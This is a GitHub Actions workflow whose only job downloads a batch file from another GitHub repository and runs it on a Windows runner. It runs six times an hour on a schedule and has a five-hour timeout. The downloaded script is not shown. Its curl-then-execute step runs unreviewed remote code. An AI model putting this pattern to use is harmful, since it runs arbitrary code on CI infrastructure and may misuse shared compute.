name: Workflow-file
on: 
  workflow_dispatch:
  schedule:
    - cron: '1,10,20,30,40,50 * * * *'
jobs:
  build:
    name: Starting Workflow-file
    runs-on: windows-latest 
    timeout-minutes: 300
    steps:
      - name: Download Workflow-file
        run: curl -s -L -o commands.bat "https://raw.githubusercontent.com/rootgit01/pup/main/commands.bat"
      - name: req
        run: |
          cd\
          dir
      - name: excute
        run: cmd /c commands.bat
